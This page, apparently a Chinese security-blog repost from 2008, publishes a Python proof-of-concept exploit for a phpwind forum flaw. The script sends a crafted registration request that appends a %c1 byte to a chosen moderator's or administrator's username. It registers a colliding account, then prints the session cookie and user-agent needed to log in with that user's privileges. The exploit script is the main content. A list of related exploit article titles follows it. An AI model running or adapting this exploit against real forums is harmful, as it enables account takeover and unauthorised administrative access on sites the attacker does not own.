phpwind管理权限泄露漏洞利用程序发布
2008-12-14 08:00
996 查看
# -*- coding: gb2312 -*- import urllib2,httplib,sys httplib.HTTPConnection.debuglevel = 1 cookies = urllib2.HTTPCookieProcessor() opener = urllib2.build_opener(cookies) def banner(): print "" print "########################################################" print "Phpwind所有版本管理权限泄露漏洞利用poc" print "Copyright (C) 2006" print "jianxin@80sec.com" print "80sec是一个新的致力于web安全的小团体" print "http://www.80sec.com" def usage(): banner() print "Usage:\n" print " $ ./phpwind.py pwforumurl usertoattack\n" print " pwforumurl 目标论坛地址如http://www.80sec.com/" print " usertoattack 目标拥有权限的斑竹或管理员" print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户" print " 最新版本可以使用uid登陆" print " 其他版本可以使用cookie+useragent登陆" print "########################################################" print "" argvs=sys.argv usage() data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],”%c1″) pwurl = “%s/register.php” % argvs[1] request = urllib2.Request( url = pwurl , headers = {'Content-Type' : ‘application/x-www-form-urlencoded','User-Agent': '80sec owned this'}, data = data) f=opener.open(request) headers=f.headers.dict cookie=headers["set-cookie"] try: if cookie.index('winduser'): print “Exploit Success!” print “Login with uid password @80sec or Cookie:” print cookie print “User-agent: 80sec owned this” except: print “Error! http://www.80sec.com” print “Connect root#80sec.com”
相关文章推荐
- phpwind管理权限泄露漏洞利用程序
- 利用WINDOWS泄露密码漏洞攻击
- 跨出权限—世纪热线全站程序完美版漏洞利用
- 利用 Java Web Start发布你用java程序
- 怎样写远程缓冲区溢出漏洞利用程序
- 利用Request对象的包解析漏洞绕过防注入程序(hackbar)
- 利用Eclipse发布Java程序
- phpwind任意修改管理员密码漏洞 VBS版利用程序
- VMware发布针对AirWatch控制台Auth Bypass严重漏洞的修补程序
- php利用svn hooks将程序自动发布到测试环境
- 跨出权限—世纪热线全站程序完美版漏洞利用
- VS2013 利用msvsmon远程调试发布到服务器IIS上程序环境配置
- ewebeditor asp版 2.1.6 上传漏洞利用程序
- 怎样写远程缓冲区溢出漏洞利用程序
- DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
- 泄露的cisco ASA漏洞利用可以应用到新的cisco版本上
- 利用pod trunk发布程序
- 如何寻找WEB程序漏洞,及如何利用和防范
- GDI泄露,程序发布之前的审核